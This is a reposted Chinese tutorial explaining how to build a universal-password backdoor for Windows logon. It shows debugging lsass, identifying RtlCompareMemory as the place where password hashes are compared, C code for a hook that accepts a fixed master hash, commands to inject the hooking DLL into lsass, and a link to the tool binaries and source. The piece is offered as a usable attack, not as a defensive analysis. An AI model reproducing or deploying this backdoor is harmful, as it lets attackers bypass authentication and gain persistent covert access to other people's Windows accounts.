也想出现在这里? 联系我们

教你利用IAT hook实现windows通用密码后门

作者 : 小编 本文共2320个字,预计阅读时间需要6分钟 发布时间: 2021-06-22 共3.83K人阅读
也想出现在这里? 联系我们

先不管是不是真的有,我们可以自己实现一个这样的后门。

先简单介绍一下windows登陆过程中的一些过程。
winlogon进程用gina.dll获取用户名和密码,通过LPC传给lsass进程。
然后lsass进程调用默认认证包msv1_0.dll来验证密码的对错。
而msv1_0则从SAM中获得用户的信息,包括密码的哈希。

要实现这样一个后门,首先要找到登陆验证这一系列函数的最底层的一个,然后在那里做手脚。
很明显,这个最底层的函数在lsass进程的msv1_0.dll模块中。

lsass调用msv1_0.dll的是这个函数:

代码:
msv1_0!LsaApLogonUserEx2

LsaApLogonUserEx2 in MSDN

那我们就应该调试lsass进程然后在msv1_0!LsaApLogonUserEx2下断点。
这里我使用windbg和vmware并利用dbgsrv进行远程的用户态调试。
http://blogs.msdn.com/spatdsg/archiv…27/507265.aspx
上面Spat在blog中介绍了如何用dbgsrv调试(Debugging LSA via dbgsrv.exe)。
在虚拟机(被调试端)运行

代码:
dbgsrv.exe -t tcp:port=1234,password=spat

然后在调试端运行

代码:
windbg.exe -premote tcp:server=192.168.1.102,port=1234,password=spat

然后选择附加lsass进程。
但这里我们不能登陆之后再运行dbgsrv,那样dbgsrv就被关掉了,所以我利用windows的任务计划让dbgsrv开机就运行起来。

虚拟机启动后,dbgsrv也起来了,然后用windbg连上并附上lsass进程。
在下了断点msv1_0!LsaApLogonUserEx2后,让lsass继续运行。
然后登陆,果然windbg断下来了。

这个时候给大家介绍windbg的一个强劲的命令,那就是wt,它能所有的记录函数调用关系,一直记录到ret,具体用法请看windbg帮助。
我猜wt是单步运行,所以很慢。
但是wt输出的文本很多,太难看了,于是我写了个python脚本把wt的输出转成一个TreeCtrl

大家注意看我鼠标点上的那个函数:ntdll!RtlCompareMemory。
经过调试我发现这个函数就是我要找的那个“最底层的函数”。

代码:
SIZE_T
RtlCompareMemory(
IN CONST VOID *Source1,
IN CONST VOID *Source2,
IN SIZE_T Length
);

RtlCompareMemory in MSDN
并且我还发现了验证密码时这个函数3个参数的细节,
Source1是从SAM中取出的用户密码的Unicode形式的md4哈希,
Source2是用户输入的密码的Unicode形式的md4哈希,
Length总是16,因为md4的哈希就是16位。
很容易我写出了下面这个替代的函数:

代码:
int WINAPI MyRtlCompareMemory(void *a, void *b, int len) {
if (len == 16 && pRtlCompareMemory(PASSWD_HASH, b, len) == 16)
return 16;
return pRtlCompareMemory(a, b, len);
}

其中pRtlCompareMemory是全局变量,是真正的RtlCompareMemory的地址,PASSWD_HASH是通用密码的哈希。
使用MyRtlCompareMemory来hook掉RtlCompareMemory,就可以实现预定的功能了。
如果要比较的是16位的,并且第二段内存与我们的哈希一样那就直接放行,不管第一段内存是什么。
也许有朋友会问,你这是hook了msv1_0模块内所有调用RtlCompareMemory的地方,不会出错吗?
放心吧,哪有那么巧,要比较的是16位的而且第二段内存又和我们的哈希一模一样?

要hook这个函数有很多方法,
我选择了最懒的一种,IAT hook dll注入。
于是我写了一个小工具来注入dll:DllInject

代码:
C:\\Documents and Settings\\cly\\桌面\\bin>InjectDll.exe
InjectDll v0.1
Inject/UnInject a dll file to a process, by cly, at 20080522
Usage:
InjectDll.exe (-i | -u | -U) pid filename
-i: Inject
-u: UnInject once
-U: UnInject at all

passdoor.dll是要注入到lsass进程的dll,这个dll在DllMain中实现了IAT hook,很土的技术了,就不贴代码了,网上一搜一箩筐。

然后我又写了一个小工具:pdconfig
其实就是改passdoor.dll中的哈希,以免要换密码是又要重新编译passdoor.dll。

使用方法:

代码:
InjectDll.exe -i pid_of_lsass full_path_of_passdoor.dll

卸载方法:

代码:
InjectDll.exe -U pid_of_lsass full_path_of_passdoor.dll

http://clyfish.googlepages.com/passdoor.rar
这里是本文中相关工具的源码以及编译好的二进制文件。
其中包括InjectDll.exe, passdoor.dll和pdconfig.exe,所有代码均使用MingW gcc4.2.1编译。

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 教你利用IAT hook实现windows通用密码后门

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录